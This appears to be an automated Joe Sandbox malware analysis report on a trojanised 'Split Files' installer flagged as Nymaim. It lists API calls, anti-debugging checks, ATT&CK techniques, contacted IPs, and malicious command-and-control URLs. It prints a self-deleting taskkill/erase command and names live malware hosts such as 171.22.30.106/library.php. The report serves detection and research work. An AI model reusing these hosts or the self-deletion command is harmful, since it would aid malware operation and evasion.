Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	5_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00423E2D FindFirstFileExW,	5_2_00423E2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_1000959D FindFirstFileExW,	5_2_1000959D
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_00104A1A FindFirstFileExW,	6_2_00104A1A

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\	Jump to behavior

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_0041336B

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

5_2_00402BF0

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

5_2_00402F20

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0044028F mov eax, dword ptr fs:[00000030h]	5_2_0044028F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0042041F mov eax, dword ptr fs:[00000030h]	5_2_0042041F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_004429E7 mov eax, dword ptr fs:[00000030h]	5_2_004429E7
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00417BAF mov eax, dword ptr fs:[00000030h]	5_2_00417BAF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_100091C7 mov eax, dword ptr fs:[00000030h]	5_2_100091C7
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_10006CE1 mov eax, dword ptr fs:[00000030h]	5_2_10006CE1
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_00105B47 mov eax, dword ptr fs:[00000030h]	6_2_00105B47
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_001033EF mov eax, dword ptr fs:[00000030h]	6_2_001033EF

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0040F789 SetUnhandledExceptionFilter,	5_2_0040F789
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0041336B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0040F5F5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040EBD2
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_10006180
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_100035DF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_10003AD4
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_00101889 SetUnhandledExceptionFilter,	6_2_00101889
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_00101269 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00101269
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_001016F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_001016F5
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_00104362 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00104362

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f

Jump to behavior

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Code function: 4_2_00459734 GetVersion,GetModuleHandleA,6CAD5550,6CAD5550,6CAD5550,AllocateAndInitializeSid,LocalFree,

4_2_00459734

Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager
Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: F.program manager

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	1_2_004051D8
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	1_2_00405224
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: GetLocaleInfoA,	4_2_004085FC
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: GetLocaleInfoA,	4_2_00408648
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,	5_2_00404D40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: EnumSystemLocalesW,	5_2_00427041
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: EnumSystemLocalesW,	5_2_0042708C
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: EnumSystemLocalesW,	5_2_00427127
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_004271B2
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: EnumSystemLocalesW,	5_2_0041E2FF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetLocaleInfoW,	5_2_00427405
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_0042752B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetLocaleInfoW,	5_2_00427631
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00427700
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetLocaleInfoW,	5_2_0041E821
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_2_00426D9F

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_0040F7F3 cpuid

5_2_0040F7F3

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Code function: 4_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6CAD5CA0,SetNamedPipeHandleState,6CF47180,CloseHandle,CloseHandle,

4_2_00455E7C

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_004026C4 GetSystemTime,

1_2_004026C4

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00405CC0 GetVersionExA,

1_2_00405CC0

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Code function: 4_2_00453D18 GetUserNameA,

4_2_00453D18

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 5.2.SplitFiles131.exe.3340000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SplitFiles131.exe.3340000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	1 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	13 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	23 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	14 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	13 Process Injection	Proc Filesystem	11 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Program Files (x86)\Split Files\SplitFiles131.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	50%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.SplitFiles131.exe.10000000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
1.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
5.2.SplitFiles131.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1250671	Download File
4.2.is-DTRND.tmp.400000.0.unpack	100%	Avira	HEUR/AGEN.1248792	Download File
1.0.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.innosetup.com/	0%	URL Reputation	safe
http://www.innosetup.com/	0%	URL Reputation	safe
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte	0%	URL Reputation	safe
http://107.182.129.235/storage/extension.php	0%	URL Reputation	safe
http://www.remobjects.com/?ps	0%	URL Reputation	safe
http://www.innosetup.com	0%	URL Reputation	safe
http://107.182.129.235/storage/ping.php	0%	URL Reputation	safe
http://171.22.30.106/library.php	100%	URL Reputation	malware
http://www.remobjects.com/?psU	0%	URL Reputation	safe
http://rus.altarsoft.com/split_files.shtml	0%	Avira URL Cloud	safe
http://www.altarsoft.com/split_files.shtml	0%	Avira URL Cloud	safe
http://www.altarsoft.com/split_files.shtml	2%	Virustotal		Browse
http://171.22.30.106/library.phpch	100%	Avira URL Cloud	malware
http://www.innosetup.comDVarFileInfo$	0%	Avira URL Cloud	safe
http://171.22.30.106/library.phpYQ	100%	Avira URL Cloud	malware
http://171.22.30.106/library.php4	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte	true	URL Reputation: safe	unknown
http://107.182.129.235/storage/extension.php	true	URL Reputation: safe	unknown
http://107.182.129.235/storage/ping.php	true	URL Reputation: safe	unknown
http://171.22.30.106/library.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.altarsoft.com/split_files.shtml	is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-8E2LT.tmp.4.dr, is-7O3KV.tmp.4.dr, is-R2P47.tmp.4.dr, is-JMARM.tmp.4.dr, is-B20UO.tmp.4.dr, is-UJJ0L.tmp.4.dr, is-JSP8F.tmp.4.dr, is-79U67.tmp.4.dr, is-APJVT.tmp.4.dr, is-7L4JB.tmp.4.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://171.22.30.106/library.phpch	SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.remobjects.com/?ps	file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	false	URL Reputation: safe	unknown
http://rus.altarsoft.com/split_files.shtml	is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-3OAED.tmp.4.dr, is-FBKGV.tmp.4.dr	false	Avira URL Cloud: safe	unknown
http://www.innosetup.com	file.exe	false	URL Reputation: safe	unknown
http://171.22.30.106/library.phpYQ	SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://171.22.30.106/library.php4	SplitFiles131.exe, 00000005.00000003.332714577.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.innosetup.comDVarFileInfo$	file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	false	Avira URL Cloud: safe	low
http://www.remobjects.com/?psU	file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.139.105.171	unknown	Italy	33657	CMCSUS	true
45.139.105.1	unknown	Italy	33657	CMCSUS	true
85.31.46.167	unknown	Germany	43659	CLOUDCOMPUTINGDE	true
107.182.129.235	unknown	Reserved	11070	META-ASUS	true
171.22.30.106	unknown	Germany	33657	CMCSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	778228
Start date and time:	2023-01-05 08:46:10 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@12/39@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 95% Number of executed functions: 186 Number of non-executed functions: 260
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:47:09	API Interceptor	1x Sleep call for process: KN38AzDG.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.139.105.171	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMCSUS	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	bun4.exe	Get hash	malicious	Browse	45.139.105.105
CMCSUS	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	bun4.exe	Get hash	malicious	Browse	45.139.105.105

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\Split Files\is-AGVDF.tmp	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\Split Files\ReadMe - EN.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2193
Entropy (8bit):	4.702648325021821
Encrypted:	false
SSDEEP:	24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
MD5:	EA42A2F0D0B4CBE042DE38568E18F1AC
SHA1:	58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
SHA-256:	AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
SHA-512:	6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
Malicious:	false
Reputation:	moderate, very likely benign file
